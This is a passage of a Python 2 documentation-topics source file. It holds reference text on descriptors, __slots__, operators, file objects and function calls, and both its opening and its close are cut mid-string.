'\n' ' Called to set the attribute on an instance *instance* ' 'of the owner\n' ' class to a new value, *value*.\n' '\n' 'object.__delete__(self, instance)\n' '\n' ' Called to delete the attribute on an instance ' '*instance* of the\n' ' owner class.\n' '\n' '\n' 'Invoking Descriptors\n' '====================\n' '\n' 'In general, a descriptor is an object attribute with ' '"binding\n' 'behavior", one whose attribute access has been ' 'overridden by methods\n' 'in the descriptor protocol: "__get__()", "__set__()", ' 'and\n' '"__delete__()". If any of those methods are defined for ' 'an object, it\n' 'is said to be a descriptor.\n' '\n' 'The default behavior for attribute access is to get, ' 'set, or delete\n' "the attribute from an object's dictionary. For instance, " '"a.x" has a\n' 'lookup chain starting with "a.__dict__[\'x\']", then\n' '"type(a).__dict__[\'x\']", and continuing through the ' 'base classes of\n' '"type(a)" excluding metaclasses.\n' '\n' 'However, if the looked-up value is an object defining ' 'one of the\n' 'descriptor methods, then Python may override the default ' 'behavior and\n' 'invoke the descriptor method instead. Where this occurs ' 'in the\n' 'precedence chain depends on which descriptor methods ' 'were defined and\n' 'how they were called. Note that descriptors are only ' 'invoked for new\n' 'style objects or classes (ones that subclass "object()" ' 'or "type()").\n' '\n' 'The starting point for descriptor invocation is a ' 'binding, "a.x". How\n' 'the arguments are assembled depends on "a":\n' '\n' 'Direct Call\n' ' The simplest and least common call is when user code ' 'directly\n' ' invokes a descriptor method: "x.__get__(a)".\n' '\n' 'Instance Binding\n' ' If binding to a new-style object instance, "a.x" is ' 'transformed\n' ' into the call: "type(a).__dict__[\'x\'].__get__(a, ' 'type(a))".\n' '\n' 'Class Binding\n' ' If binding to a new-style class, "A.x" is transformed ' 'into the\n' ' call: "A.__dict__[\'x\'].__get__(None, A)".\n' '\n' 'Super Binding\n' ' If "a" is an instance of "super", then the binding ' '"super(B,\n' ' obj).m()" searches "obj.__class__.__mro__" for the ' 'base class "A"\n' ' immediately preceding "B" and then invokes the ' 'descriptor with the\n' ' call: "A.__dict__[\'m\'].__get__(obj, ' 'obj.__class__)".\n' '\n' 'For instance bindings, the precedence of descriptor ' 'invocation depends\n' 'on the which descriptor methods are defined. A ' 'descriptor can define\n' 'any combination of "__get__()", "__set__()" and ' '"__delete__()". If it\n' 'does not define "__get__()", then accessing the ' 'attribute will return\n' 'the descriptor object itself unless there is a value in ' "the object's\n" 'instance dictionary. If the descriptor defines ' '"__set__()" and/or\n' '"__delete__()", it is a data descriptor; if it defines ' 'neither, it is\n' 'a non-data descriptor. Normally, data descriptors ' 'define both\n' '"__get__()" and "__set__()", while non-data descriptors ' 'have just the\n' '"__get__()" method. Data descriptors with "__set__()" ' 'and "__get__()"\n' 'defined always override a redefinition in an instance ' 'dictionary. In\n' 'contrast, non-data descriptors can be overridden by ' 'instances.\n' '\n' 'Python methods (including "staticmethod()" and ' '"classmethod()") are\n' 'implemented as non-data descriptors. Accordingly, ' 'instances can\n' 'redefine and override methods. This allows individual ' 'instances to\n' 'acquire behaviors that differ from other instances of ' 'the same class.\n' '\n' 'The "property()" function is implemented as a data ' 'descriptor.\n' 'Accordingly, instances cannot override the behavior of a ' 'property.\n' '\n' '\n' '__slots__\n' '=========\n' '\n' 'By default, instances of both old and new-style classes ' 'have a\n' 'dictionary for attribute storage. This wastes space for ' 'objects\n' 'having very few instance variables. The space ' 'consumption can become\n' 'acute when creating large numbers of instances.\n' '\n' 'The default can be overridden by defining *__slots__* in ' 'a new-style\n' 'class definition. The *__slots__* declaration takes a ' 'sequence of\n' 'instance variables and reserves just enough space in ' 'each instance to\n' 'hold a value for each variable. Space is saved because ' '*__dict__* is\n' 'not created for each instance.\n' '\n' '__slots__\n' '\n' ' This class variable can be assigned a string, ' 'iterable, or sequence\n' ' of strings with variable names used by instances. If ' 'defined in a\n' ' new-style class, *__slots__* reserves space for the ' 'declared\n' ' variables and prevents the automatic creation of ' '*__dict__* and\n' ' *__weakref__* for each instance.\n' '\n' ' New in version 2.2.\n' '\n' 'Notes on using *__slots__*\n' '\n' '* When inheriting from a class without *__slots__*, the ' '*__dict__*\n' ' attribute of that class will always be accessible, so ' 'a *__slots__*\n' ' definition in the subclass is meaningless.\n' '\n' '* Without a *__dict__* variable, instances cannot be ' 'assigned new\n' ' variables not listed in the *__slots__* definition. ' 'Attempts to\n' ' assign to an unlisted variable name raises ' '"AttributeError". If\n' ' dynamic assignment of new variables is desired, then ' 'add\n' ' "\'__dict__\'" to the sequence of strings in the ' '*__slots__*\n' ' declaration.\n' '\n' ' Changed in version 2.3: Previously, adding ' '"\'__dict__\'" to the\n' ' *__slots__* declaration would not enable the ' 'assignment of new\n' ' attributes not specifically listed in the sequence of ' 'instance\n' ' variable names.\n' '\n' '* Without a *__weakref__* variable for each instance, ' 'classes\n' ' defining *__slots__* do not support weak references to ' 'its\n' ' instances. If weak reference support is needed, then ' 'add\n' ' "\'__weakref__\'" to the sequence of strings in the ' '*__slots__*\n' ' declaration.\n' '\n' ' Changed in version 2.3: Previously, adding ' '"\'__weakref__\'" to the\n' ' *__slots__* declaration would not enable support for ' 'weak\n' ' references.\n' '\n' '* *__slots__* are implemented at the class level by ' 'creating\n' ' descriptors (Implementing Descriptors) for each ' 'variable name. As a\n' ' result, class attributes cannot be used to set default ' 'values for\n' ' instance variables defined by *__slots__*; otherwise, ' 'the class\n' ' attribute would overwrite the descriptor assignment.\n' '\n' '* The action of a *__slots__* declaration is limited to ' 'the class\n' ' where it is defined. As a result, subclasses will ' 'have a *__dict__*\n' ' unless they also define *__slots__* (which must only ' 'contain names\n' ' of any *additional* slots).\n' '\n' '* If a class defines a slot also defined in a base ' 'class, the\n' ' instance variable defined by the base class slot is ' 'inaccessible\n' ' (except by retrieving its descriptor directly from the ' 'base class).\n' ' This renders the meaning of the program undefined. In ' 'the future, a\n' ' check may be added to prevent this.\n' '\n' '* Nonempty *__slots__* does not work for classes derived ' 'from\n' ' "variable-length" built-in types such as "long", "str" ' 'and "tuple".\n' '\n' '* Any non-string iterable may be assigned to ' '*__slots__*. Mappings\n' ' may also be used; however, in the future, special ' 'meaning may be\n' ' assigned to the values corresponding to each key.\n' '\n' '* *__class__* assignment works only if both classes have ' 'the same\n' ' *__slots__*.\n' '\n' ' Changed in version 2.6: Previously, *__class__* ' 'assignment raised an\n' ' error if either new or old class had *__slots__*.\n', 'attribute-references': '\n' 'Attribute references\n' '********************\n' '\n' 'An attribute reference is a primary followed by a ' 'period and a name:\n' '\n' ' attributeref ::= primary "." identifier\n' '\n' 'The primary must evaluate to an object of a type ' 'that supports\n' 'attribute references, e.g., a module, list, or an ' 'instance. This\n' 'object is then asked to produce the attribute whose ' 'name is the\n' 'identifier. If this attribute is not available, the ' 'exception\n' '"AttributeError" is raised. Otherwise, the type and ' 'value of the\n' 'object produced is determined by the object. ' 'Multiple evaluations of\n' 'the same attribute reference may yield different ' 'objects.\n', 'augassign': '\n' 'Augmented assignment statements\n' '*******************************\n' '\n' 'Augmented assignment is the combination, in a single statement, ' 'of a\n' 'binary operation and an assignment statement:\n' '\n' ' augmented_assignment_stmt ::= augtarget augop ' '(expression_list | yield_expression)\n' ' augtarget ::= identifier | attributeref | ' 'subscription | slicing\n' ' augop ::= "+=" | "-=" | "*=" | "/=" | ' '"//=" | "%=" | "**="\n' ' | ">>=" | "<<=" | "&=" | "^=" | "|="\n' '\n' '(See section Primaries for the syntax definitions for the last ' 'three\n' 'symbols.)\n' '\n' 'An augmented assignment evaluates the target (which, unlike ' 'normal\n' 'assignment statements, cannot be an unpacking) and the ' 'expression\n' 'list, performs the binary operation specific to the type of ' 'assignment\n' 'on the two operands, and assigns the result to the original ' 'target.\n' 'The target is only evaluated once.\n' '\n' 'An augmented assignment expression like "x += 1" can be ' 'rewritten as\n' '"x = x + 1" to achieve a similar, but not exactly equal effect. ' 'In the\n' 'augmented version, "x" is only evaluated once. Also, when ' 'possible,\n' 'the actual operation is performed *in-place*, meaning that ' 'rather than\n' 'creating a new object and assigning that to the target, the old ' 'object\n' 'is modified instead.\n' '\n' 'With the exception of assigning to tuples and multiple targets ' 'in a\n' 'single statement, the assignment done by augmented assignment\n' 'statements is handled the same way as normal assignments. ' 'Similarly,\n' 'with the exception of the possible *in-place* behavior, the ' 'binary\n' 'operation performed by augmented assignment is the same as the ' 'normal\n' 'binary operations.\n' '\n' 'For targets which are attribute references, the same caveat ' 'about\n' 'class and instance attributes applies as for regular ' 'assignments.\n', 'binary': '\n' 'Binary arithmetic operations\n' '****************************\n' '\n' 'The binary arithmetic operations have the conventional priority\n' 'levels. Note that some of these operations also apply to certain ' 'non-\n' 'numeric types. Apart from the power operator, there are only two\n' 'levels, one for multiplicative operators and one for additive\n' 'operators:\n' '\n' ' m_expr ::= u_expr | m_expr "*" u_expr | m_expr "//" u_expr | ' 'm_expr "/" u_expr\n' ' | m_expr "%" u_expr\n' ' a_expr ::= m_expr | a_expr "+" m_expr | a_expr "-" m_expr\n' '\n' 'The "*" (multiplication) operator yields the product of its ' 'arguments.\n' 'The arguments must either both be numbers, or one argument must be ' 'an\n' 'integer (plain or long) and the other must be a sequence. In the\n' 'former case, the numbers are converted to a common type and then\n' 'multiplied together. In the latter case, sequence repetition is\n' 'performed; a negative repetition factor yields an empty sequence.\n' '\n' 'The "/" (division) and "//" (floor division) operators yield the\n' 'quotient of their arguments. The numeric arguments are first\n' 'converted to a common type. Plain or long integer division yields ' 'an\n' 'integer of the same type; the result is that of mathematical ' 'division\n' "with the 'floor' function applied to the result. Division by zero\n" 'raises the "ZeroDivisionError" exception.\n' '\n' 'The "%" (modulo) operator yields the remainder from the division ' 'of\n' 'the first argument by the second. The numeric arguments are ' 'first\n' 'converted to a common type. A zero right argument raises the\n' '"ZeroDivisionError" exception. The arguments may be floating ' 'point\n' 'numbers, e.g., "3.14%0.7" equals "0.34" (since "3.14" equals ' '"4*0.7 +\n' '0.34".) The modulo operator always yields a result with the same ' 'sign\n' 'as its second operand (or zero); the absolute value of the result ' 'is\n' 'strictly smaller than the absolute value of the second operand ' '[2].\n' '\n' 'The integer division and modulo operators are connected by the\n' 'following identity: "x == (x/y)*y + (x%y)". Integer division and\n' 'modulo are also connected with the built-in function "divmod()":\n' '"divmod(x, y) == (x/y, x%y)". These identities don\'t hold for\n' 'floating point numbers; there similar identities hold ' 'approximately\n' 'where "x/y" is replaced by "floor(x/y)" or "floor(x/y) - 1" [3].\n' '\n' 'In addition to performing the modulo operation on numbers, the ' '"%"\n' 'operator is also overloaded by string and unicode objects to ' 'perform\n' 'string formatting (also known as interpolation). The syntax for ' 'string\n' 'formatting is described in the Python Library Reference, section\n' 'String Formatting Operations.\n' '\n' 'Deprecated since version 2.3: The floor division operator, the ' 'modulo\n' 'operator, and the "divmod()" function are no longer defined for\n' 'complex numbers. Instead, convert to a floating point number ' 'using\n' 'the "abs()" function if appropriate.\n' '\n' 'The "+" (addition) operator yields the sum of its arguments. The\n' 'arguments must either both be numbers or both sequences of the ' 'same\n' 'type. In the former case, the numbers are converted to a common ' 'type\n' 'and then added together. In the latter case, the sequences are\n' 'concatenated.\n' '\n' 'The "-" (subtraction) operator yields the difference of its ' 'arguments.\n' 'The numeric arguments are first converted to a common type.\n', 'bitwise': '\n' 'Binary bitwise operations\n' '*************************\n' '\n' 'Each of the three bitwise operations has a different priority ' 'level:\n' '\n' ' and_expr ::= shift_expr | and_expr "&" shift_expr\n' ' xor_expr ::= and_expr | xor_expr "^" and_expr\n' ' or_expr ::= xor_expr | or_expr "|" xor_expr\n' '\n' 'The "&" operator yields the bitwise AND of its arguments, which ' 'must\n' 'be plain or long integers. The arguments are converted to a ' 'common\n' 'type.\n' '\n' 'The "^" operator yields the bitwise XOR (exclusive OR) of its\n' 'arguments, which must be plain or long integers. The arguments ' 'are\n' 'converted to a common type.\n' '\n' 'The "|" operator yields the bitwise (inclusive) OR of its ' 'arguments,\n' 'which must be plain or long integers. The arguments are ' 'converted to\n' 'a common type.\n', 'bltin-code-objects': '\n' 'Code Objects\n' '************\n' '\n' 'Code objects are used by the implementation to ' 'represent "pseudo-\n' 'compiled" executable Python code such as a function ' 'body. They differ\n' "from function objects because they don't contain a " 'reference to their\n' 'global execution environment. Code objects are ' 'returned by the built-\n' 'in "compile()" function and can be extracted from ' 'function objects\n' 'through their "func_code" attribute. See also the ' '"code" module.\n' '\n' 'A code object can be executed or evaluated by passing ' 'it (instead of a\n' 'source string) to the "exec" statement or the built-in ' '"eval()"\n' 'function.\n' '\n' 'See The standard type hierarchy for more ' 'information.\n', 'bltin-ellipsis-object': '\n' 'The Ellipsis Object\n' '*******************\n' '\n' 'This object is used by extended slice notation (see ' 'Slicings). It\n' 'supports no special operations. There is exactly ' 'one ellipsis object,\n' 'named "Ellipsis" (a built-in name).\n' '\n' 'It is written as "Ellipsis". When in a subscript, ' 'it can also be\n' 'written as "...", for example "seq[...]".\n', 'bltin-file-objects': '\n' 'File Objects\n' '************\n' '\n' 'File objects are implemented using C\'s "stdio" ' 'package and can be\n' 'created with the built-in "open()" function. File ' 'objects are also\n' 'returned by some other built-in functions and methods, ' 'such as\n' '"os.popen()" and "os.fdopen()" and the "makefile()" ' 'method of socket\n' 'objects. Temporary files can be created using the ' '"tempfile" module,\n' 'and high-level file operations such as copying, ' 'moving, and deleting\n' 'files and directories can be achieved with the ' '"shutil" module.\n' '\n' 'When a file operation fails for an I/O-related reason, ' 'the exception\n' '"IOError" is raised. This includes situations where ' 'the operation is\n' 'not defined for some reason, like "seek()" on a tty ' 'device or writing\n' 'a file opened for reading.\n' '\n' 'Files have the following methods:\n' '\n' 'file.close()\n' '\n' ' Close the file. A closed file cannot be read or ' 'written any more.\n' ' Any operation which requires that the file be open ' 'will raise a\n' ' "ValueError" after the file has been closed. ' 'Calling "close()"\n' ' more than once is allowed.\n' '\n' ' As of Python 2.5, you can avoid having to call this ' 'method\n' ' explicitly if you use the "with" statement. For ' 'example, the\n' ' following code will automatically close *f* when ' 'the "with" block\n' ' is exited:\n' '\n' ' from __future__ import with_statement # This ' "isn't required in Python 2.6\n" '\n' ' with open("hello.txt") as f:\n' ' for line in f:\n' ' print line,\n' '\n' ' In older versions of Python, you would have needed ' 'to do this to\n' ' get the same effect:\n' '\n' ' f = open("hello.txt")\n' ' try:\n' ' for line in f:\n' ' print line,\n' ' finally:\n' ' f.close()\n' '\n' ' Note: Not all "file-like" types in Python support ' 'use as a\n' ' context manager for the "with" statement. If ' 'your code is\n' ' intended to work with any file-like object, you ' 'can use the\n' ' function "contextlib.closing()" instead of using ' 'the object\n' ' directly.\n' '\n' 'file.flush()\n' '\n' ' Flush the internal buffer, like "stdio"\'s ' '"fflush()". This may be\n' ' a no-op on some file-like objects.\n' '\n' ' Note: "flush()" does not necessarily write the ' "file's data to\n" ' disk. Use "flush()" followed by "os.fsync()" to ' 'ensure this\n' ' behavior.\n' '\n' 'file.fileno()\n' '\n' ' Return the integer "file descriptor" that is used ' 'by the underlying\n' ' implementation to request I/O operations from the ' 'operating system.\n' ' This can be useful for other, lower level ' 'interfaces that use file\n' ' descriptors, such as the "fcntl" module or ' '"os.read()" and friends.\n' '\n' ' Note: File-like objects which do not have a real ' 'file descriptor\n' ' should *not* provide this method!\n' '\n' 'file.isatty()\n' '\n' ' Return "True" if the file is connected to a ' 'tty(-like) device, else\n' ' "False".\n' '\n' ' Note: If a file-like object is not associated with ' 'a real file,\n' ' this method should *not* be implemented.\n' '\n' 'file.next()\n' '\n' ' A file object is its own iterator, for example ' '"iter(f)" returns\n' ' *f* (unless *f* is closed). When a file is used as ' 'an iterator,\n' ' typically in a "for" loop (for example, "for line ' 'in f: print\n' ' line.strip()"), the "next()" method is called ' 'repeatedly. This\n' ' method returns the next input line, or raises ' '"StopIteration" when\n' ' EOF is hit when the file is open for reading ' '(behavior is undefined\n' ' when the file is open for writing). In order to ' 'make a "for" loop\n' ' the most efficient way of looping over the lines of ' 'a file (a very\n' ' common operation), the "next()" method uses a ' 'hidden read-ahead\n' ' buffer. As a consequence of using a read-ahead ' 'buffer, combining\n' ' "next()" with other file methods (like ' '"readline()") does not work\n' ' right. However, using "seek()" to reposition the ' 'file to an\n' ' absolute position will flush the read-ahead ' 'buffer.\n' '\n' ' New in version 2.3.\n' '\n' 'file.read([size])\n' '\n' ' Read at most *size* bytes from the file (less if ' 'the read hits EOF\n' ' before obtaining *size* bytes). If the *size* ' 'argument is negative\n' ' or omitted, read all data until EOF is reached. ' 'The bytes are\n' ' returned as a string object. An empty string is ' 'returned when EOF\n' ' is encountered immediately. (For certain files, ' 'like ttys, it\n' ' makes sense to continue reading after an EOF is ' 'hit.) Note that\n' ' this method may call the underlying C function ' '"fread()" more than\n' ' once in an effort to acquire as close to *size* ' 'bytes as possible.\n' ' Also note that when in non-blocking mode, less data ' 'than was\n' ' requested may be returned, even if no *size* ' 'parameter was given.\n' '\n' ' Note: This function is simply a wrapper for the ' 'underlying\n' ' "fread()" C function, and will behave the same in ' 'corner cases,\n' ' such as whether the EOF value is cached.\n' '\n' 'file.readline([size])\n' '\n' ' Read one entire line from the file. A trailing ' 'newline character\n' ' is kept in the string (but may be absent when a ' 'file ends with an\n' ' incomplete line). [6] If the *size* argument is ' 'present and non-\n' ' negative, it is a maximum byte count (including the ' 'trailing\n' ' newline) and an incomplete line may be returned. ' 'When *size* is not\n' ' 0, an empty string is returned *only* when EOF is ' 'encountered\n' ' immediately.\n' '\n' ' Note: Unlike "stdio"\'s "fgets()", the returned ' 'string contains\n' ' null characters ("\'\\0\'") if they occurred in ' 'the input.\n' '\n' 'file.readlines([sizehint])\n' '\n' ' Read until EOF using "readline()" and return a list ' 'containing the\n' ' lines thus read. If the optional *sizehint* ' 'argument is present,\n' ' instead of reading up to EOF, whole lines totalling ' 'approximately\n' ' *sizehint* bytes (possibly after rounding up to an ' 'internal buffer\n' ' size) are read. Objects implementing a file-like ' 'interface may\n' ' choose to ignore *sizehint* if it cannot be ' 'implemented, or cannot\n' ' be implemented efficiently.\n' '\n' 'file.xreadlines()\n' '\n' ' This method returns the same thing as "iter(f)".\n' '\n' ' New in version 2.1.\n' '\n' ' Deprecated since version 2.3: Use "for line in ' 'file" instead.\n' '\n' 'file.seek(offset[, whence])\n' '\n' ' Set the file\'s current position, like "stdio"\'s ' '"fseek()". The\n' ' *whence* argument is optional and defaults to ' '"os.SEEK_SET" or "0"\n' ' (absolute file positioning); other values are ' '"os.SEEK_CUR" or "1"\n' ' (seek relative to the current position) and ' '"os.SEEK_END" or "2"\n' " (seek relative to the file's end). There is no " 'return value.\n' '\n' ' For example, "f.seek(2, os.SEEK_CUR)" advances the ' 'position by two\n' ' and "f.seek(-3, os.SEEK_END)" sets the position to ' 'the third to\n' ' last.\n' '\n' ' Note that if the file is opened for appending (mode ' '"\'a\'" or\n' ' "\'a+\'"), any "seek()" operations will be undone ' 'at the next write.\n' ' If the file is only opened for writing in append ' 'mode (mode "\'a\'"),\n' ' this method is essentially a no-op, but it remains ' 'useful for files\n' ' opened in append mode with reading enabled (mode ' '"\'a+\'"). If the\n' ' file is opened in text mode (without "\'b\'"), only ' 'offsets returned\n' ' by "tell()" are legal. Use of other offsets causes ' 'undefined\n' ' behavior.\n' '\n' ' Note that not all file objects are seekable.\n' '\n' ' Changed in version 2.6: Passing float values as ' 'offset has been\n' ' deprecated.\n' '\n' 'file.tell()\n' '\n' " Return the file's current position, like " '"stdio"\'s "ftell()".\n' '\n' ' Note: On Windows, "tell()" can return illegal ' 'values (after an\n' ' "fgets()") when reading files with Unix-style ' 'line-endings. Use\n' ' binary mode ("\'rb\'") to circumvent this ' 'problem.\n' '\n' 'file.truncate([size])\n' '\n' " Truncate the file's size. If the optional *size* " 'argument is\n' ' present, the file is truncated to (at most) that ' 'size. The size\n' ' defaults to the current position. The current file ' 'position is not\n' ' changed. Note that if a specified size exceeds the ' "file's current\n" ' size, the result is platform-dependent: ' 'possibilities include that\n' ' the file may remain unchanged, increase to the ' 'specified size as if\n' ' zero-filled, or increase to the specified size with ' 'undefined new\n' ' content. Availability: Windows, many Unix ' 'variants.\n' '\n' 'file.write(str)\n' '\n' ' Write a string to the file. There is no return ' 'value. Due to\n' ' buffering, the string may not actually show up in ' 'the file until\n' ' the "flush()" or "close()" method is called.\n' '\n' 'file.writelines(sequence)\n' '\n' ' Write a sequence of strings to the file. The ' 'sequence can be any\n' ' iterable object producing strings, typically a list ' 'of strings.\n' ' There is no return value. (The name is intended to ' 'match\n' ' "readlines()"; "writelines()" does not add line ' 'separators.)\n' '\n' 'Files support the iterator protocol. Each iteration ' 'returns the same\n' 'result as "readline()", and iteration ends when the ' '"readline()"\n' 'method returns an empty string.\n' '\n' 'File objects also offer a number of other interesting ' 'attributes.\n' 'These are not required for file-like objects, but ' 'should be\n' 'implemented if they make sense for the particular ' 'object.\n' '\n' 'file.closed\n' '\n' ' bool indicating the current state of the file ' 'object. This is a\n' ' read-only attribute; the "close()" method changes ' 'the value. It may\n' ' not be available on all file-like objects.\n' '\n' 'file.encoding\n' '\n' ' The encoding that this file uses. When Unicode ' 'strings are written\n' ' to a file, they will be converted to byte strings ' 'using this\n' ' encoding. In addition, when the file is connected ' 'to a terminal,\n' ' the attribute gives the encoding that the terminal ' 'is likely to use\n' ' (that information might be incorrect if the user ' 'has misconfigured\n' ' the terminal). The attribute is read-only and may ' 'not be present\n' ' on all file-like objects. It may also be "None", in ' 'which case the\n' ' file uses the system default encoding for ' 'converting Unicode\n' ' strings.\n' '\n' ' New in version 2.3.\n' '\n' 'file.errors\n' '\n' ' The Unicode error handler used along with the ' 'encoding.\n' '\n' ' New in version 2.6.\n' '\n' 'file.mode\n' '\n' ' The I/O mode for the file. If the file was created ' 'using the\n' ' "open()" built-in function, this will be the value ' 'of the *mode*\n' ' parameter. This is a read-only attribute and may ' 'not be present on\n' ' all file-like objects.\n' '\n' 'file.name\n' '\n' ' If the file object was created using "open()", the ' 'name of the\n' ' file. Otherwise, some string that indicates the ' 'source of the file\n' ' object, of the form "<...>". This is a read-only ' 'attribute and may\n' ' not be present on all file-like objects.\n' '\n' 'file.newlines\n' '\n' ' If Python was built with *universal newlines* ' 'enabled (the default)\n' ' this read-only attribute exists, and for files ' 'opened in universal\n' ' newline read mode it keeps track of the types of ' 'newlines\n' ' encountered while reading the file. The values it ' 'can take are\n' ' "\'\\r\'", "\'\\n\'", "\'\\r\\n\'", "None" ' '(unknown, no newlines read yet) or\n' ' a tuple containing all the newline types seen, to ' 'indicate that\n' ' multiple newline conventions were encountered. For ' 'files not opened\n' ' in universal newlines read mode the value of this ' 'attribute will be\n' ' "None".\n' '\n' 'file.softspace\n' '\n' ' Boolean that indicates whether a space character ' 'needs to be\n' ' printed before another value when using the "print" ' 'statement.\n' ' Classes that are trying to simulate a file object ' 'should also have\n' ' a writable "softspace" attribute, which should be ' 'initialized to\n' ' zero. This will be automatic for most classes ' 'implemented in\n' ' Python (care may be needed for objects that ' 'override attribute\n' ' access); types implemented in C will have to ' 'provide a writable\n' ' "softspace" attribute.\n' '\n' ' Note: This attribute is not used to control the ' '"print"\n' ' statement, but to allow the implementation of ' '"print" to keep\n' ' track of its internal state.\n', 'bltin-null-object': '\n' 'The Null Object\n' '***************\n' '\n' "This object is returned by functions that don't " 'explicitly return a\n' 'value. It supports no special operations. There is ' 'exactly one null\n' 'object, named "None" (a built-in name).\n' '\n' 'It is written as "None".\n', 'bltin-type-objects': '\n' 'Type Objects\n' '************\n' '\n' 'Type objects represent the various object types. An ' "object's type is\n" 'accessed by the built-in function "type()". There are ' 'no special\n' 'operations on types. The standard module "types" ' 'defines names for\n' 'all standard built-in types.\n' '\n' 'Types are written like this: "<type \'int\'>".\n', 'booleans': '\n' 'Boolean operations\n' '******************\n' '\n' ' or_test ::= and_test | or_test "or" and_test\n' ' and_test ::= not_test | and_test "and" not_test\n' ' not_test ::= comparison | "not" not_test\n' '\n' 'In the context of Boolean operations, and also when expressions ' 'are\n' 'used by control flow statements, the following values are ' 'interpreted\n' 'as false: "False", "None", numeric zero of all types, and empty\n' 'strings and containers (including strings, tuples, lists,\n' 'dictionaries, sets and frozensets). All other values are ' 'interpreted\n' 'as true. (See the "__nonzero__()" special method for a way to ' 'change\n' 'this.)\n' '\n' 'The operator "not" yields "True" if its argument is false, ' '"False"\n' 'otherwise.\n' '\n' 'The expression "x and y" first evaluates *x*; if *x* is false, ' 'its\n' 'value is returned; otherwise, *y* is evaluated and the resulting ' 'value\n' 'is returned.\n' '\n' 'The expression "x or y" first evaluates *x*; if *x* is true, its ' 'value\n' 'is returned; otherwise, *y* is evaluated and the resulting value ' 'is\n' 'returned.\n' '\n' '(Note that neither "and" nor "or" restrict the value and type ' 'they\n' 'return to "False" and "True", but rather return the last ' 'evaluated\n' 'argument. This is sometimes useful, e.g., if "s" is a string ' 'that\n' 'should be replaced by a default value if it is empty, the ' 'expression\n' '"s or \'foo\'" yields the desired value. Because "not" has to ' 'invent a\n' 'value anyway, it does not bother to return a value of the same ' 'type as\n' 'its argument, so e.g., "not \'foo\'" yields "False", not ' '"\'\'".)\n', 'break': '\n' 'The "break" statement\n' '*********************\n' '\n' ' break_stmt ::= "break"\n' '\n' '"break" may only occur syntactically nested in a "for" or "while"\n' 'loop, but not nested in a function or class definition within that\n' 'loop.\n' '\n' 'It terminates the nearest enclosing loop, skipping the optional ' '"else"\n' 'clause if the loop has one.\n' '\n' 'If a "for" loop is terminated by "break", the loop control target\n' 'keeps its current value.\n' '\n' 'When "break" passes control out of a "try" statement with a ' '"finally"\n' 'clause, that "finally" clause is executed before really leaving ' 'the\n' 'loop.\n', 'callable-types': '\n' 'Emulating callable objects\n' '**************************\n' '\n' 'object.__call__(self[, args...])\n' '\n' ' Called when the instance is "called" as a function; if ' 'this method\n' ' is defined, "x(arg1, arg2, ...)" is a shorthand for\n' ' "x.__call__(arg1, arg2, ...)".\n', 'calls': '\n' 'Calls\n' '*****\n' '\n' 'A call calls a callable object (e.g., a *function*) with a ' 'possibly\n' 'empty series of *arguments*:\n' '\n' ' call ::= primary "(" [argument_list [","]\n' ' | expression genexpr_for] ")"\n' ' argument_list ::= positional_arguments ["," ' 'keyword_arguments]\n' ' ["," "*" expression] ["," ' 'keyword_arguments]\n' ' ["," "**" expression]\n' ' | keyword_arguments ["," "*" expression]\n' ' ["," "**" expression]\n' ' | "*" expression ["," keyword_arguments] ["," ' '"**" expression]\n' ' | "**" expression\n' ' positional_arguments ::= expression ("," expression)*\n' ' keyword_arguments ::= keyword_item ("," keyword_item)*\n' ' keyword_item ::= identifier "=" expression\n' '\n' 'A trailing comma may be present after the positional and keyword\n' 'arguments but does not affect the semantics.\n' '\n' 'The primary must evaluate to a callable object (user-defined\n' 'functions, built-in functions, methods of built-in objects, class\n' 'objects, methods of class instances, and certain class instances\n' 'themselves are callable; extensions may define additional callable\n' 'object types). All argument expressions are evaluated before the ' 'call\n' 'is attempted. Please refer to section Function definitions for ' 'the\n' 'syntax of formal *parameter* lists.\n' '\n' 'If keyword arguments are present, they are first converted to\n' 'positional arguments, as follows. First, a list of unfilled slots ' 'is\n' 'created for the formal parameters. If there are N positional\n' 'arguments, they are placed in the first N slots. Next, for each\n' 'keyword argument, the identifier is used to determine the\n' 'corresponding slot (if the identifier is the same as the first ' 'formal\n' 'parameter name, the first slot is used, and so on). If the slot ' 'is\n' 'already filled, a "TypeError" exception is raised. Otherwise, the\n' 'value of the argument is placed in the slot, filling it (even if ' 'the\n' 'expression is "None", it fills the slot). When all arguments have\n' 'been processed, the slots that are still unfilled are filled with ' 'the\n' 'corresponding default value from the function definition. ' '(Default\n' 'values are calculated, once, when the function is defined; thus, a\n' 'mutable object such as a list or dictionary used as default value ' 'will\n' "be shared by all calls that don't specify an argument value for " 'the\n' 'corresponding slot; this should usually be avoided.) If there are ' 'any\n' 'unfilled slots for which no default value is specified, a ' '"TypeError"\n' 'exception is raised. Otherwise, the list of filled slots is used ' 'as\n' 'the argument list for the call.\n' '\n' '**CPython implementation detail:** An implementation may provide\n' 'built-in functions whose positional parameters do not have names, ' 'even\n' "if they are 'named' for the purpose of documentation, and which\n" 'therefore cannot be supplied by keyword. In CPython, this is the ' 'case\n' 'for functions implemented in C that use "PyArg_ParseTuple()" to ' 'parse\n' 'their arguments.\n' '\n' 'If there are more positional arguments than there are formal ' 'parameter\n' 'slots, a "TypeError" exception is raised, unless a formal ' 'parameter\n' 'using the syntax "*identifier" is present; in this case, that ' 'formal\n' 'parameter receives a tuple containing the excess positional ' 'arguments\n' '(or an empty tuple if there were no excess positional arguments).\n' '\n' 'If any keyword argument does not correspond to a formal parameter\n' 'name, a "TypeError" exception is raised, unless a formal parameter\n' 'using the syntax "**identifier" is present; in this case, that ' 'formal\n' 'parameter receives a dictionary containing the excess keyword\n' 'arguments (using the keywords as keys and the argument values as\n' 'corresponding values), or a (new) empty dictionary if there were ' 'no\n' 'excess keyword arguments.\n' '\n' 'If the syntax "*expression" appears in the function call, ' '"expression"\n' 'must evaluate to an iterable. Elements from this iterable are ' 'treated\n' 'as if they were additional positional arguments; if there are\n' 'positional arguments *x1*, ..., *xN*, and "expression" evaluates to ' 'a\n' 'sequence *y1*, ..., *yM*, this is equivalent to a call with M+N\n' 'positional arguments *x1*, ..., *xN*, *y1*, ..., *yM*.\n' '\n' 'A consequence of this is that although the "*expression" syntax ' 'may\n' 'appear *after* some keyword arguments, it is processed *before* ' 'the\n' 'keyword arguments (and the "**expression" argument, if any -- see\n' 'below). So:\n' '\n' ' >>> def f(a, b):\n' ' ... print a, b\n' ' ...\n' ' >>> f(b=1, *(2,))\n' ' 2 1\n' ' >>> f(a=1, *(2,))\n' ' Traceback (most recent call last):\n' ' File "<stdin>", line 1, in ?\n' " TypeError: f() got multiple values for keyword argument 'a'\n" ' >>> f(1, *(2,))\n' ' 1 2\n' '\n' 'It is 